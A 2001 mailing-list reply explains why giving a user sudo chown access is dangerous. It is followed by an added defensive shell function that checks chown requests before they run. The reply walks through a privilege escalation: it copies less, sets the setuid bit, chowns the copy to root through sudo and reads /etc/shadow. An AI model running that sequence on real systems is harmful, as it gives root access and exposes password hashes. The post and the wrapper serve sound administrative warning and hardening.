
Re: Sudo and Chown?



At 994972732s since epoch (07/12/01 19:18:52 -0400 UTC), Paul Socolow wrote:
> I would like to give a user the ability to chown files in certain
> directories to other users' ownership.

As per earlier discussions about sudo, it's very difficult to give
'limited' sudo access.

Even if you fix the hard-linking problem, consider the following fun
that a user with sudo chown access could have:

# cp /usr/bin/less ./
# chmod a+s ./less
# sudo chown root.root ./less
# ls -l less

-rwsr-sr-x    1 root     root        79516 Jul 12 20:11 less

(uh-oh)

# ./less /etc/shadow
root:$gfv49$Q923JVbmn.932cj9%bogus:11481:0:99999:7:::
daemon:*:11405:0:99999:7:::
...

DOH!  I'm sure you can use your imagination for other fun programs to
SUID... =)

chmod/chown are extremely dangerous binaries to give root privs on, as
they essentially give you the ability to setuid anything to root.
That said, most binaries can be dangerous when given root privs (bash,
cat, echo, rm, cp, mv, tar).

Be very, very careful.

Jason

--
Jason Healy    |     jhealy@logn.net
LogN Systems   |   http://www.logn.net/
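
Added example, not part of the original message: a pre-flight check that a restricted chown wrapper could run before touching a file, refusing the setuid and hard-link cases raised above. The names check_chown_request and ALLOWED_DIR and the path /srv/handoff are assumptions, and the script relies on GNU stat and realpath.

```shell
#!/bin/sh
# Added example: validation step for a wrapper placed in sudoers instead of
# chown itself. check_chown_request and ALLOWED_DIR are hypothetical names.
# Assumes GNU coreutils (stat -c, realpath).
# The check and a later chown are not atomic, so the directory must also be
# one where the requesting user cannot rename or relink files in between.

ALLOWED_DIR=${ALLOWED_DIR:-/srv/handoff}   # constructed placeholder path

# check_chown_request OWNER PATH
# Returns 0 if the request is acceptable, 1 (reason on stderr) if not.
check_chown_request() {
    owner=$1
    path=$2
    # Resolve the new owner to a numeric uid; "root.root" style input fails here.
    case $owner in
        ''|*[!0-9]*) uid=$(id -u "$owner" 2>/dev/null) ||
                         { echo "unknown owner: $owner" >&2; return 1; } ;;
        *) uid=$owner ;;
    esac
    # Never hand a file to uid 0.
    [ "$uid" -ne 0 ] || { echo "refusing chown to uid 0" >&2; return 1; }
    # Regular files only, and never through a symlink.
    [ ! -L "$path" ] && [ -f "$path" ] ||
        { echo "not a regular file: $path" >&2; return 1; }
    # The fully resolved path must sit under the allowed directory.
    base=$(realpath -- "$ALLOWED_DIR") && real=$(realpath -- "$path") || return 1
    case $real in
        "$base"/*) ;;
        *) echo "outside $base: $real" >&2; return 1 ;;
    esac
    # Setuid/setgid bits are the escalation shown in the session above.
    if [ -u "$real" ] || [ -g "$real" ]; then
        echo "setuid/setgid bit set: $real" >&2; return 1
    fi
    # More than one hard link means the same inode is reachable by another name.
    [ "$(stat -c %h -- "$real")" -eq 1 ] ||
        { echo "multiple hard links: $real" >&2; return 1; }
    return 0
}
```
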


